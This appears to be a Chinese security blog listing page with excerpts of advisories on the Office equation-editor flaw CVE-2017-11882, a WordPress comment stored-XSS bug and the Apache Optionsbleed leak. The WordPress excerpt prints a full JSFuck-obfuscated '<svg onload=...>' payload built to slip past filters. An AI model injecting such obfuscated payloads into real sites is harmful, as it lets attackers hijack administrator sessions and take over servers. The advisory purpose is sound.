隐藏17年的Office远程代码执行漏洞现POC样本(CVE-2017-11882)

images

获取样本途径如下

2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。

由于漏洞影响面较广,漏洞披露后,我们持续对漏洞相关攻击事件进行了关注。11月19日,我们监控到了已有漏洞POC在网上流传,迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。

漏洞影响版本

  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

漏洞事件分析

漏洞出现在模块EQNEDT32.EXE中,该模块为公式编辑器,在Office的安装过程中被默认安装。该模块以OLE技术(Object Linking and Embedding,对象链接与嵌入)将公式嵌入在Office文档内。

images

图 1 – Microsoft 公式编辑器

当插入和编辑数学公式时,EQNEDT32.EXE并不会被作为Office进程(如Word等)的子进程创建,而是以单独的进程形式存在。这就意味着对于WINWORD.EXE, EXCEL.EXE等Office进程的保护机制,无法阻止EQNEDT32.EXE这个进程被利用。

由于该模块对于输入的公式未作正确的处理,攻击者可以通过刻意构造的数据内容覆盖掉栈上的函数地址,从而劫持程序流程,在登录用户的上下文环境中执行任意命令。

images

图 2 – CVE-2017-11882 POC中所执行的命令

继续阅读“隐藏17年的Office远程代码执行漏洞现POC样本(CVE-2017-11882)”

安全预警,2017最新 WordPress储存型XSS漏洞 【转】

漏洞概述及危害

建站程序类型:php+MySql
漏洞类型:储存型XSS
缺陷文件: formatting.php
漏洞参数:<svg onload=alert(‘1’)> ,(进行混淆)

代码如下:

<svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()>

涉及版本:全版本
危害程度:高危
涉及厂商:WordPress
厂商网站:https://www.wordpress.org/
安装量:非常大
是否拥有源代码分析:有
是否默认配置:是

此漏洞影响WordPress全部版本包括最新版本的WordPress(4.8)都存在评论处的存储型XSS。攻击者可以未授权通过WordPress的评论注入JavaScript攻击代码。

评论被查看的时候,JavaScript就触发了。如果管理员登陆查看评论触发后,可能导致攻击者进入后台通过主题或插件编辑从而命令执行控制整个服务器。

当然,攻击者也可以创建新的管理员,甚至修改管理员密码,等等只要是管理员能在目标系统上做的任何事情。

继续阅读“安全预警,2017最新 WordPress储存型XSS漏洞 【转】”

心脏滴血二代来袭,CVE-2017-9798

选项 – HTTP OPTIONS方法可能会泄漏Apache的服务器内存

optionsbleed如果您在日常互联网使用HTTP协议,通常只使用两种方法:GET和POST。然而,HTTP有许多其他方法,所以我想知道你可以做什么,如果有任何漏洞。一种HTTP方法称为OPTIONS。它只是允许向服务器询问其支持的其他HTTP方法。服务器用“允许”标题回答,并给我们一个逗号分隔的支持方法列表。Alexa前100万的扫描显示了一些奇怪的事情:大量的服务器发出一个“允许”标题,看起来像是损坏的数据。 一些例子: 允许:,GET ,,, POST,OPTIONS,HEAD ,, 允许:POST,OPTIONS ,, HEAD,:09:44 GMT

继续阅读“心脏滴血二代来袭,CVE-2017-9798”